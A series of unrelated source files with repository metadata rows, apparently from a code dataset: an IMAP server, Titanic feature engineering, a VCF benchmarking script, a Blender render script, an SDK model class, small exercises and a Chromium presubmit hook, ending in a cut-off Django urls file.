credentials.checkPassword, realPassword)
# pass result of checkPassword, and the username that was
# being authenticated, to self._checkedPassword
checking.addCallback(self._checkedPassword, username)
return checking
else:
raise credError.UnauthorizedLogin("No such user")
def _checkedPassword(self, matched, username):
if matched:
# password was correct
return username
else:
raise credError.UnauthorizedLogin("Bad password")
class IMAPServerProtocol(imap4.IMAP4Server):
"Subclass of imap4.IMAP4Server that adds debugging."
debug = True
def lineReceived(self, line):
if self.debug:
print "CLIENT:", line
imap4.IMAP4Server.lineReceived(self, line)
def sendLine(self, line):
imap4.IMAP4Server.sendLine(self, line)
if self.debug:
print "SERVER:", line
class IMAPFactory(protocol.Factory):
protocol = IMAPServerProtocol
portal = None # placeholder
def buildProtocol(self, address):
p = self.protocol()
p.portal = self.portal
p.factory = self
return p
if __name__ == "__main__":
import sys
dataDir = sys.argv[1]
portal = portal.Portal(MailUserRealm(dataDir))
passwordFile = os.path.join(dataDir, 'passwords.txt')
passwords = passwordFileToDict(passwordFile)
passwordChecker = CredentialsChecker(passwords)
portal.registerChecker(passwordChecker)
factory = IMAPFactory()
factory.portal = portal
reactor.listenTCP(143, factory)
reactor.run() | [
"[email protected]"
] | |
f817dc9cd7b0ee5cb3fb0d8da067107e84fabd08 | c380976b7c59dadaccabacf6b541124c967d2b5a | /.history/src/data/data_20191021130626.py | 54a8374208393201a7d3ecf5fa63dc428630f047 | [
"MIT"
] | permissive | bkraft4257/kaggle_titanic | b83603563b4a3c995b631e8142fe72e1730a0e2e | f29ea1773773109a867278c001dbd21a9f7b21dd | refs/heads/master | 2020-08-17T12:45:28.653402 | 2019-11-15T16:20:04 | 2019-11-15T16:20:04 | 215,667,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,770 | py | import pandas as pd
import numpy as np
from typing import Union
from pathlib import Path
from nameparser import HumanName
class ExtractData:
def __init__(self, filename: Union[str, Path], age_bins = None, drop_columns=None):
# """Extract Training Data from file or Path
# Arguments:
# filename {[str]} -- Filename of CSV data file containing data.
# drop_columns -- Columns in dataframe that should be dropped.
# """
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.filename = filename
self.drop_columns = drop_columns
self.all_label_columns = ["survived"]
self.all_feature_columns = [
"pclass",
"name",
"sex",
"age",
"sibsp",
"parch",
"ticket",
"fare",
"cabin",
"embarked",
]
self.Xy_raw = None
self.extract_raw()
def extract_raw(self):
"""
Extracts data from a CSV file.
Returns:
pd.DataFrame -- [description]
"""
Xy_raw = pd.read_csv(self.filename)
Xy_raw.columns = Xy_raw.columns.str.lower().str.replace(" ", "_")
Xy_raw = Xy_raw.rename(columns={"age": "age_known"})
Xy_raw["pclass"] = Xy_raw["pclass"].astype("category")
self.Xy_raw = Xy_raw.set_index("passengerid")
class TransformData:
title_translator = {
"Mlle.": "Mrs.",
"Mme.": "Mrs.",
"Sir.": "Mr.",
"Ms.": "Mrs.",
"Rev.": "Mr.",
"": "Mr.",
"Col.": "Mr.",
"Capt.": "Mr.",
"Lady.": "Mrs.",
"the Countess. of": "Mrs.",
}
def __init__(
self,
raw_data,
adult_age_threshold_min=13,
age_bins = None,
Xy_age_estimate=None,
drop_columns=None,
):
# """Extract Training Data from file or Path
# Arguments:
# filename {[str]} -- Filename of CSV data file containing data.
# drop_columns -- Columns in dataframe that should be dropped.
# """
if age_bins is None:
age_bins = [0,10,20,30, 40, 50, 60, np.inf]
if drop_columns is None:
drop_columns = ["age", "cabin", "name", "ticket"]
self.raw = raw_data
self.adult_age_threshold_min = adult_age_threshold_min
self.Xy_age_estimate = Xy_age_estimate
        self.age_bins = age_bins
        self.drop_columns = drop_columns
self.Xy = self.raw.Xy_raw.copy()
self.extract_title()
self.extract_last_name()
self.extract_cabin_number()
self.extract_cabin_prefix()
self.estimate_age()
self.calc_is_child()
self.calc_is_travelling_alone()
def calc_is_travelling_alone(self):
self.Xy["is_travelling_alone"] = (self.Xy.sibsp == 0) & (self.Xy.parch == 0)
def calc_is_child(self):
self.Xy["is_child"] = self.Xy.age < self.adult_age_threshold_min
def extract_cabin_number(self):
self.Xy["cabin_number"] = self.Xy.ticket.str.extract("(\d+)$")
def extract_cabin_prefix(self):
self.Xy["cabin_prefix"] = self.Xy.ticket.str.extract("^(.+) ")
def extract_title(self):
"""[summary]
"""
self.Xy["title"] = (
self.Xy.name.apply(lambda x: HumanName(x).title)
.replace(self.title_translator)
.replace({"\.": ""}, regex=True)
)
def extract_last_name(self):
self.Xy["last_name"] = self.Xy.name.apply(lambda x: HumanName(x).last)
def calc_age_bins(self):
        self.Xy['age_bin'] = pd.cut(self.Xy.age, bins=self.age_bins)
def clean(self,):
"""Clean data to remove missing data and "unnecessary" features.
Arguments:
in_raw_df {pd.DataFrame} -- Dataframe containing all columns and rows Kaggle Titanic Training Data set
"""
        self.Xy = self.Xy.drop(self.drop_columns, axis=1)
def estimate_age(self, groupby_columns=["sex", "title"]):
"""[summary]
Keyword Arguments:
groupby {list} -- [description] (default: {['sex','title']})
"""
if self.Xy_age_estimate is None:
Xy_age_estimate = (
self.Xy.groupby(groupby_columns).age_known.mean().to_frame().round(1)
)
Xy_age_estimate = Xy_age_estimate.rename(
columns={"age_known": "age_estimate"}
)
out_df = self.Xy.reset_index().merge(Xy_age_estimate, on=groupby_columns)
out_df["age"] = out_df["age_known"].fillna(out_df["age_estimate"])
self.Xy = out_df
self.Xy_age_estimate = Xy_age_estimate
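

# Minimal usage sketch (illustrative only; the CSV file name below is an
# assumption, not part of this module):
#
#   raw = ExtractData('train.csv')
#   data = TransformData(raw)
#   data.Xy[['age', 'title', 'is_child', 'is_travelling_alone']].head()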
| [
"[email protected]"
] | |
c42757ed648fb8b964c0e0ab2fa9c6969b1b2058 | cc4c8bec896c2d0a6ac4c1f0e01f73d8157f891a | /util/__deprecated.aggregate_variants_n_depth_to_table.py | 9819ed136498e9b69c83b545a2d93ff6258dd946 | [] | no_license | NCIP/ctat-mutations-benchmarking | fe6a79007d6a22e4301b130a55f982d835b57691 | 1a8fe28860c3d216ba0acfe888b300dc3235c79a | refs/heads/main | 2023-05-29T21:00:57.730494 | 2021-05-12T17:53:20 | 2021-05-12T17:53:20 | 366,363,093 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,110 | py | #!/usr/bin/env python
import os,sys,argparse
import subprocess
import numpy as np
import pandas as pd
import re
import pickle
import csv
csv.field_size_limit(100000000)
def configure_vcf(vcf, column_name, chr_idx=0, coord_idx=1, refallele_idx=3, varallele_idx=4):
'''
Configure the vcf file to prepare for merging with other data
'''
print('Loading {} VCF: {}'.format(column_name, vcf))
df = pd.read_csv(vcf, sep='\t', header=None, comment='#',engine='python')
## Remove "chr" if in front of chromosome number
df.loc[:,chr_idx] = df.loc[:,chr_idx].map(str)
df.loc[:,chr_idx] = df.loc[:,0].map(lambda x: x.lstrip('chr'))
df=df.replace({chr_idx: {"X":"23","Y":"24","MT":"25","M":"25"}})
df["CHROMPOS"] = df.iloc[:,chr_idx] + ':' +df.iloc[:,coord_idx].map(str)
## set column name to SNP ref:alt
df[column_name] = df.iloc[:,refallele_idx].map(str) + ':' +df.iloc[:,varallele_idx].map(str)
## use column names from the VCF format.
df.rename(columns={chr_idx:'CHROM',coord_idx:'POS', refallele_idx:'REF', varallele_idx:'VAR'}, inplace=True)
print(df.head())
return df
def add_variant_attribute_from_vcf(df, vcf_filename, column_name, **kwargs):
# check for pickle file and load
pickle_path = os.path.basename(vcf_filename) + ".pickle"
print(pickle_path)
var_attribute_df = None
if (os.path.exists(pickle_path)):
print('Loading Pickle: {}'.format(pickle_path))
inPickle = open(pickle_path,'rb')
var_attribute_df = pickle.load(inPickle)
inPickle.close()
# if not found, read and create the pickle
else:
print('Creating Pickle: {}'.format(pickle_path))
var_attribute_df = configure_vcf(vcf_filename, column_name, **kwargs)
outPickle = open(pickle_path, 'wb')
pickle.dump(var_attribute_df, outPickle)
outPickle.close()
var_attribute_df = var_attribute_df[['CHROMPOS', column_name]]
df = pd.merge(df, var_attribute_df, how='left', on='CHROMPOS')
# Check
print(df.head())
return df
def check_if_chr_bam(filename):
cmd = 'samtools idxstats '+ filename +'| cut -f1'
output = (subprocess.check_output(cmd, shell=True))
print(output)
m_chr = re.findall(r'Y\\n(.*)\\n', str(output))[0].split('\\n')[0] ## seems brittle... //TODO: more rigorous way?
chr_prefix_flag = 'chr' in str(output)
print('****',chr_prefix_flag, m_chr)
return chr_prefix_flag, m_chr
def add_depth_info(df, bam_filename, column_name):
print(df.head())
#########################################################################
# Create a bed file of SNP locations, used to extract coverage depth info.
########################################################################
df_bed = df[['CHROM', 'POS']].copy()
df_bed.columns = ['Chr', 'Pos'] # using different ones for the bed
print(df_bed.head())
df_bed['Pos'] = df_bed['Pos'].map(int) # store positions as integers.
df_bed['Pos-1'] = (df_bed['Pos']-1)
## Check if "chr" in front of chromosome name in the bam file
chr_prefix_flag, m_chr_pred = check_if_chr_bam(bam_filename)
if chr_prefix_flag:
df_bed['Chr'] = 'chr' + df_bed['Chr'].map(str) # add chr at the beginning of chr names
# back-convert X,Y,M from numeric vals used earlier
df_bed['Chr'] = df_bed.loc[:,'Chr'].replace('23','X') #replace chr23 with chrX
df_bed['Chr'] = df_bed.loc[:,'Chr'].replace('24','Y') #replace chr24 with chrY
df_bed['Chr'] = df_bed.loc[:,'Chr'].replace('25', m_chr_pred) #replace chr25 with chrM
# sort by chr, pos
df_bed = df_bed.sort_values(['Chr', 'Pos'], ascending=[True, True])
# make bed file containing target sites for depth calc
bed_filename = os.path.basename(bam_filename) + ".{}_count.variants_pos.bed".format(len(df_bed))
if os.path.exists(bed_filename):
print("-reusing bed file: {}".format(bed_filename))
else:
df_bed.to_csv(bed_filename, sep ='\t', index=False, header=False, na_rep='NA', columns=['Chr', 'Pos-1', 'Pos'])
print('Bed File created: {}'.format(bed_filename))
# make depth file
depth_filename = bed_filename + ".depth"
if os.path.exists(depth_filename):
print("-reusing depth file: {}".format(depth_filename))
else:
cmd = "samtools depth -b {} {} > {}".format(bed_filename, bam_filename, depth_filename)
subprocess.check_call(cmd, shell=True)
print("Depth file created: {}".format(depth_filename))
# Merge depth values with SNP values
df_depth = pd.read_csv(depth_filename, sep='\t', header=None, low_memory=False)
if chr_prefix_flag:
df_depth.loc[:,0] = df_depth.loc[:,0].map(lambda x: x.lstrip('chr'))
df_depth=df_depth.replace({0: {"X":"23", "Y":"24", "MT":"25", "M":"25"} })
df_depth["CHROMPOS"] = df_depth.iloc[:,0].map(str) + ':' +df_depth.iloc[:,1].map(str)
df_depth[column_name] = df_depth.iloc[:,2]
## simplify to just the 2 columns we want
df_depth = df_depth[['CHROMPOS',column_name]]
## merge into the original data frame
df = pd.merge(df, df_depth, how='left', on='CHROMPOS')
return df
def restrict_regions(input_vcf_file, restrict_regions_bed_file):
restricted_vcf_file = input_vcf_file + ".restricted.vcf"
cmd = "bcftools filter -T {} {} -o {}".format(restrict_regions_bed_file, input_vcf_file, restricted_vcf_file)
subprocess.check_call(cmd, shell=True)
return restricted_vcf_file
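
# Note: the file passed via --restrict_regions_bed is expected to be a BED file
# (tab-separated "chrom start end", 0-based half-open coordinates), one of the
# region formats accepted by `bcftools filter -T`.
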
def main():
## Input arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, description = "Convert vcf file to benchmarking input file\n")
parser.add_argument('--pred_vcf', required = True, dest = 'pred_vcf', help="input prediction vcf")
parser.add_argument('--truth_vcf', required = True, help="reference truth set vcf")
parser.add_argument('--pred_bam', required = True , dest = 'bam_file', help="Alignment file of reads with the reference")
parser.add_argument('--out', required = True , dest = 'out_file', help="Output filename")
parser.add_argument('--exome_bam', help="Alignment file of the exome with the reference")
parser.add_argument("--restrict_regions_bed", help="bed file containing regions to restrict analysis to. (ie. high confidence regions)")
## filtering options.
parser.add_argument('--dbsnp', dest = 'dbsnp', help="input dbsnp file")
parser.add_argument('--rnaediting', dest = 'rnaediting', help="input rnaediting file")
parser.add_argument('--cosmic', dest = 'cosmic', help="input cosmic file")
args = parser.parse_args()
pred_vcf = args.pred_vcf
truth_vcf = args.truth_vcf
## apply region restrictions to input vcfs
if args.restrict_regions_bed:
pred_vcf = restrict_regions(pred_vcf, args.restrict_regions_bed)
truth_vcf = restrict_regions(truth_vcf, args.restrict_regions_bed)
## Load input vcfs to python df
df_pred = configure_vcf(pred_vcf,'RNA_SNP') ## load prediction vcf
df_ref = configure_vcf(truth_vcf,'Ref_SNP')
## merge dfs
df = pd.merge(pd.DataFrame(df_pred, columns = ['CHROMPOS','CHROM', 'POS', 'RNA_SNP']),
pd.DataFrame(df_ref, columns = ['CHROMPOS', 'CHROM' ,'POS', 'Ref_SNP']),
on=['CHROMPOS', 'CHROM', 'POS'] ,how='outer')
#--------------------------------------
# Merge with the DBSNP vcf file to see common variants
#--------------------------------------
if args.dbsnp:
df = add_variant_attribute_from_vcf(df, args.dbsnp, 'dbsnp_SNP')
#--------------------------------------
# Merge with the rnaediting vcf file
#--------------------------------------
if args.rnaediting:
# rnaediting column idxs are slightly off from expected vcf formatting, requires slight adjustment.
df = add_variant_attribute_from_vcf(df, args.rnaediting, 'rnaediting_SNP', refallele_idx=2, varallele_idx=3)
#--------------------------------------
# Merge with the COSMIC vcf file
#--------------------------------------
if args.cosmic:
df = add_variant_attribute_from_vcf(df, args.cosmic, 'cosmic_SNP')
print('VCFs loaded.')
## get rna-seq depth info
df = add_depth_info(df, args.bam_file, 'RNAseq_Depth')
if args.exome_bam:
df = add_depth_info(df, args.exome_bam, "Exome_Depth")
## make filtering a separate script.
##filter out the indels
#if args.filter_indels :
# print('Filtering Indels ... ')
# mask = (df['RNA_SNP'].astype(str).str.len() <= 3) & (df['Ref_SNP'].astype(str).str.len() <= 3)
# df = df.loc[mask]
df.to_csv(args.out_file,sep = '\t', index=False, na_rep='NA')
print('Done!')
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
0684d234e85f6b170a94bbdd8fe260adcc0f1b90 | 0296bc69a0d9608ed826ad7a719395f019df098f | /old_modules/render_model_1.py | 9fc3f68c9e69607c41d3e1a6f72240c17d64ea5e | [] | no_license | jcn16/Blender_HDRmap_render | c0486a77e04c5b41a6f75f123dbdb3d10c682367 | 50e6cdb79fef83081de9830e7105dd425a235a9e | refs/heads/main | 2023-07-19T22:22:53.622052 | 2021-08-20T06:29:10 | 2021-08-20T06:29:10 | 377,757,283 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,746 | py | from math import radians, sin, cos, pi
import mathutils, bpy, argparse, random, time, os,logging
def generate_rand(a=0, b=1, only_positive=False):
x = (random.random()-0.5) * 2*b
if abs(x) < a or (only_positive and x<0):
return generate_rand(a, b, only_positive)
else:
return x
def point_at(obj, target, roll=0):
"""
Rotate obj to look at target
:arg obj: the object to be rotated. Usually the camera
:arg target: the location (3-tuple or Vector) to be looked at
:arg roll: The angle of rotation about the axis from obj to target in radians.
Based on: https://blender.stackexchange.com/a/5220/12947 (ideasman42)
"""
if not isinstance(target, mathutils.Vector):
target = mathutils.Vector(target)
loc = obj.location
# direction points from the object to the target
direction = target - loc
quat = direction.to_track_quat('-Z', 'Y')
# /usr/share/blender/scripts/addons/add_advanced_objects_menu/arrange_on_curve.py
quat = quat.to_matrix().to_4x4()
rollMatrix = mathutils.Matrix.Rotation(roll, 4, 'Z')
# remember the current location, since assigning to obj.matrix_world changes it
loc = loc.to_tuple()
obj.matrix_world = quat * rollMatrix
obj.location = loc
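
# Example (illustrative): aim an existing camera object at the world origin
# with no roll:
#
#   point_at(camera, mathutils.Vector((0.0, 0.0, 0.0)), roll=0.0)
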
# init & params
logger = logging.getLogger()
logger.setLevel(logging.ERROR)
random.seed(time.time())
light_num_low, light_num_high = 6, 12
light_loc_low, light_loc_high = 3, 6
#context = bpy.context
model_path = '/media/jcn/新加卷/JCN/CLOTHES/Human_model/衬衫裙子/model_3'
model = "model_3.obj"
render_path = "/media/jcn/新加卷/JCN/CLOTHES/Results/2/%08d.png"
quat_file = "/media/jcn/新加卷/JCN/CLOTHES/Results/2/result.txt"
# Delete default cube
bpy.data.objects['Cube'].select = True
bpy.ops.object.delete()
for obj in bpy.data.objects:
bpy.data.objects[obj.name].select = True
bpy.ops.object.delete()
# rendering process
# create a scene
#scene = bpy.data.scenes.new("Scene")
scene = bpy.context.scene
context=bpy.context
# create a camera
camera_data = bpy.data.cameras.new("Camera")
camera = bpy.data.objects.new("Camera", camera_data)
distance, alpha, beta, gamma = 4.5, 1.0, 89.0, 0.0
alpha, beta, gamma = radians(alpha), radians(beta), radians(gamma)
camera.location = mathutils.Vector((distance*cos(beta)*cos(alpha), distance*cos(beta)*sin(alpha), distance*sin(beta)))
point_at(camera, mathutils.Vector((0, -0.4, 0)), roll=gamma)
print('camera by looked_at', camera.location, camera.rotation_euler, camera.rotation_euler.to_quaternion())
scene.objects.link(camera)
# Create lights (lights with random num in random directions)
# light number:6~12, point light
light_num = random.randint(a=light_num_low, b=light_num_high)
print('create %d light(s) at:', light_num)
for idx in range(light_num):
light_data = bpy.data.lamps.new('light'+str(idx), type='POINT')
light = bpy.data.objects.new('light'+str(idx), light_data)
light_loc = (generate_rand(light_loc_low, light_loc_high), generate_rand(light_loc_low, light_loc_high), generate_rand(light_loc_low, light_loc_high, True))
light.location = mathutils.Vector(light_loc)
scene.objects.link(light)
light_data = bpy.data.lamps.new('light', type='POINT')
light = bpy.data.objects.new('light', light_data)
light.location = mathutils.Vector((0, 0, 8))
scene.objects.link(light)
scene.update()
scene.render.resolution_x = 2048
scene.render.resolution_y = 2048
scene.render.resolution_percentage = 100
scene.render.alpha_mode = 'TRANSPARENT'
scene.camera = camera
path = os.path.join(model_path, model)
# make a new scene with cam and lights linked
context.screen.scene = scene
bpy.ops.scene.new(type='LINK_OBJECTS')
context.scene.name = model_path
cams = [c for c in context.scene.objects if c.type == 'CAMERA']
print(cams)
bpy.context.scene.use_nodes = True
tree = bpy.context.scene.node_tree
links = tree.links
bpy.context.scene.render.image_settings.color_depth = '8'
bpy.context.scene.render.image_settings.color_mode = 'RGB'
# Clear default nodes
for n in tree.nodes:
tree.nodes.remove(n)
# Must be enabled, otherwise the normal/albedo passes cannot be output
bpy.context.scene.render.layers['RenderLayer'].use_pass_normal = True
bpy.context.scene.render.layers["RenderLayer"].use_pass_color = True
bpy.context.scene.render.image_settings.file_format = 'PNG'
# Create input render layer node.
render_layers = tree.nodes.new('CompositorNodeRLayers')
scale_normal = tree.nodes.new(type="CompositorNodeMixRGB")
scale_normal.blend_type = 'MULTIPLY'
scale_normal.inputs[2].default_value = (0.5, 0.5, 0.5, 1)
links.new(render_layers.outputs['Normal'], scale_normal.inputs[1])
bias_normal = tree.nodes.new(type="CompositorNodeMixRGB")
bias_normal.blend_type = 'ADD'
bias_normal.inputs[2].default_value = (0.5, 0.5, 0.5, 0)
links.new(scale_normal.outputs[0], bias_normal.inputs[1])
normal_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
normal_file_output.label = 'Normal Output'
links.new(bias_normal.outputs[0], normal_file_output.inputs[0])
# Remap as other types can not represent the full range of depth.
depth_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
depth_file_output.label = 'Depth Output'
map = tree.nodes.new(type="CompositorNodeMapValue")
# Size is chosen kind of arbitrarily, try out until you're satisfied with resulting depth map.
map.offset = [-0.7]
map.size = [0.1]
map.use_min = True
map.min = [0]
links.new(render_layers.outputs['Depth'], map.inputs[0])
links.new(map.outputs[0], depth_file_output.inputs[0])
# image_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
# image_file_output.label = 'Image'
# links.new(render_layers.outputs['Image'], image_file_output.inputs[0])
#print('image_idx: %08d, camera: (%.3f,%.3f,%.3f)' % (image_idx, a * 180. /pi, b * 180. / pi, g * 180. / pi))
albedo_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
albedo_file_output.label = 'Albedo Output'
links.new(render_layers.outputs['Color'], albedo_file_output.inputs[0])
# import model
bpy.ops.import_scene.obj(filepath=path, axis_forward='-Z', axis_up='Y', filter_glob="*.obj;*.mtl") #-Z, Y
# print('scene objects:')
for o in context.scene.objects:
print(o)
for obj in context.scene.objects:
if obj.name in ['Camera.001'] + ['light'+str(idx) for idx in range(light_num)]:
continue
else:
obj.location = mathutils.Vector((0, 0, -2.0))
obj.scale = mathutils.Vector((0.002, 0.002, 0.002))
c = cams[0]
scene = bpy.context.scene
#scene = bpy.context.scene
f_quat = open(quat_file, 'w')
image_idx = 0
for g in [0]:
g = radians(float(g))
for b in [20, -20]:
b = radians(float(b))
for a in range(1, 360, 60):
a = radians(float(a))
c.location = mathutils.Vector((distance*cos(b)*cos(a), distance*cos(b)*sin(a), distance*sin(b)))
point_at(c, mathutils.Vector((0, -0.4, 0)), roll = g)
quat = c.rotation_euler.to_quaternion()
for output_node in [normal_file_output, depth_file_output,albedo_file_output]:
output_node.base_path = ''
scene.render.filepath = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/image_%03d' % image_idx
# image_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/image%d' % image_idx
normal_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/normal_%03d' % image_idx
depth_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/depth_%03d' % image_idx
albedo_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/albedo_%03d' % image_idx
bpy.ops.render.render(use_viewport=True,write_still=True)
#context.scene.render.filepath = render_path % image_idx
f_quat.write('%08d,%.4f,%.4f,%.4f,%.4f,%.4f,%.4f,%.4f\n' % (image_idx, quat[0], quat[1], quat[2], quat[3], a * 180 /pi, b * 180 / pi, g * 180 / pi))
image_idx = image_idx + 1
f_quat.close()
| [
"[email protected]"
] | |
5b66423e71498cd6180f23934fe7cc35d8fdb9e0 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-rms/huaweicloudsdkrms/v1/model/list_resources_response.py | dacd35a56aafb9e80f1c69849e3d804d2346de25 | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,605 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ListResourcesResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'resources': 'list[ResourceEntity]',
'page_info': 'PageInfo'
}
attribute_map = {
'resources': 'resources',
'page_info': 'page_info'
}
def __init__(self, resources=None, page_info=None):
"""ListResourcesResponse - a model defined in huaweicloud sdk"""
super(ListResourcesResponse, self).__init__()
self._resources = None
self._page_info = None
self.discriminator = None
if resources is not None:
self.resources = resources
if page_info is not None:
self.page_info = page_info
@property
def resources(self):
"""Gets the resources of this ListResourcesResponse.
        Resource list.
:return: The resources of this ListResourcesResponse.
:rtype: list[ResourceEntity]
"""
return self._resources
@resources.setter
def resources(self, resources):
"""Sets the resources of this ListResourcesResponse.
        Resource list.
:param resources: The resources of this ListResourcesResponse.
:type: list[ResourceEntity]
"""
self._resources = resources
@property
def page_info(self):
"""Gets the page_info of this ListResourcesResponse.
:return: The page_info of this ListResourcesResponse.
:rtype: PageInfo
"""
return self._page_info
@page_info.setter
def page_info(self, page_info):
"""Sets the page_info of this ListResourcesResponse.
:param page_info: The page_info of this ListResourcesResponse.
:type: PageInfo
"""
self._page_info = page_info
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListResourcesResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
4ca9bd19679fbb30fc5ed30b750ee022fc94c075 | 5ffdf4ddee5700e6bb3b062a07c1a9cf7e6adbc1 | /PYTHON/Strings/capitalize.py | 8cc94026d63e0fa32d0b508f4cfd21061a7f66e7 | [
"MIT"
] | permissive | byung-u/HackerRank | 23df791f9460970c3b4517cb7bb15f615c5d47d0 | 4c02fefff7002b3af774b99ebf8d40f149f9d163 | refs/heads/master | 2021-05-05T13:05:46.722675 | 2018-03-30T08:07:36 | 2018-03-30T08:07:36 | 104,960,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | #!/usr/bin/env python3
def capitalize(string):
s = string.split(' ')
    for i in range(len(s)):
        if s[i] and s[i][0].isalpha():
            s[i] = s[i].title()
return ' '.join(s)
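
# For example:
#   capitalize('hello   world') -> 'Hello   World'   (runs of spaces are preserved)
#   capitalize('1 w 2 r 3g')    -> '1 W 2 R 3g'      (only words starting with a letter are capitalized)
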
if __name__ == '__main__':
string = input()
capitalized_string = capitalize(string)
print(capitalized_string)
| [
"[email protected]"
] | |
e3c98e936946924d57a64be20bd0d6c76705512b | e55480007fde8acea46fe8eeb3ee7193c25ba113 | /src/leetcode/1-99/09.py | 4b14b2dee65b6c8465f1912a9386dbbec7fe586c | [] | no_license | Annihilation7/Ds-and-Al | 80301bf543ec2eb4b3a9810f5fc25b0386847fd3 | a0bc5f5ef4a92c0e7a736dcff77df61d46b57409 | refs/heads/master | 2020-09-24T05:04:41.250051 | 2020-02-15T10:31:10 | 2020-02-15T10:31:10 | 225,669,366 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | # -*- coding: utf-8 -*-
# Email: [email protected]
# Created: 2019-12-09 12:11am
'''
Determine whether an integer is a palindrome. A palindrome number reads the
same forward (left to right) and backward (right to left).

Example 1:
Input: 121
Output: true

Example 2:
Input: -121
Output: false
Explanation: Read left to right it is -121; read right to left it is 121-.
Therefore it is not a palindrome.

Example 3:
Input: 10
Output: false
Explanation: Read right to left it is 01. Therefore it is not a palindrome.
'''
class Solution:
def isPalindrome(self, x: int) -> bool:
'''
        Negative numbers can never be palindromes, so reject them first.
        Then compare digits using a head/tail "two pointer" style approach on
        the number itself (no string conversion).
'''
if x < 0:
return False
k = 1
while x // k >= 10:
k *= 10
while x:
left = x // k
right = x % 10
if left != right:
return False
            # The two key steps:
            #   - drop the leftmost and rightmost digits from what is left of x
            #   - shrink k accordingly (two digits were removed, hence // 100)
            # Working through a small example (e.g. 1221) makes this clear.
x = x % k // 10
k //= 100
return True
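

# Minimal sanity check (added for illustration; not part of the original
# solution). The expected values follow from the problem statement above.
if __name__ == '__main__':
    s = Solution()
    assert s.isPalindrome(121) is True
    assert s.isPalindrome(-121) is False
    assert s.isPalindrome(10) is False
    assert s.isPalindrome(0) is True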
| [
"[email protected]"
] | |
64be974da5067480a0088094c5764bb85d240db1 | 3b9b4049a8e7d38b49e07bb752780b2f1d792851 | /src/ui/webui/resources/PRESUBMIT.py | 2ac87faf2b09787c19200dad102e395811d7661e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | webosce/chromium53 | f8e745e91363586aee9620c609aacf15b3261540 | 9171447efcf0bb393d41d1dc877c7c13c46d8e38 | refs/heads/webosce | 2020-03-26T23:08:14.416858 | 2018-08-23T08:35:17 | 2018-09-20T14:25:18 | 145,513,343 | 0 | 2 | Apache-2.0 | 2019-08-21T22:44:55 | 2018-08-21T05:52:31 | null | UTF-8 | Python | false | false | 1,001 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
def PostUploadHook(cl, change, output_api):
rietveld_obj = cl.RpcServer()
description = rietveld_obj.get_description(cl.issue)
existing_bots = (change.CQ_INCLUDE_TRYBOTS or '').split(';')
clean_bots = set(filter(None, map(lambda s: s.strip(), existing_bots)))
new_bots = clean_bots | set(['tryserver.chromium.linux:closure_compilation'])
new_tag = 'CQ_INCLUDE_TRYBOTS=%s' % ';'.join(new_bots)
if clean_bots:
tag_reg = '^CQ_INCLUDE_TRYBOTS=.*$'
new_description = re.sub(tag_reg, new_tag, description, flags=re.M | re.I)
else:
new_description = description + '\n' + new_tag
if new_description == description:
return []
rietveld_obj.update_description(cl.issue, new_description)
return [output_api.PresubmitNotifyResult(
'Automatically added optional Closure bots to run on CQ.')]
| [
"[email protected]"
] | |
1ecae13285e6b4e11101cf69d5d4f92b64b71913 | 8fd55e7a0f8764b3fe894d927c39173507f03855 | /sms/urls.py | f75a34a656dee837302b3de1b925fe0d38081e04 | [] | no_license | bogdal/django-sms | 2ed97cbafd7c2a9b4b1521c766e89b2514b63e75 | fa0ed8369228b2b3160e8b577b6377587ce1fe5a | refs/heads/master | 2020-04-05T08:22:29.864245 | 2013-04-24T09:28:34 | 2013-04-24T09:28:34 | 3,496,819 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | from django.conf.urls import patterns, url
from sms.decorators import ip_restrictions
from sms.views import callback_received_sms, callback_delivery_report
urlpatterns = patterns('',
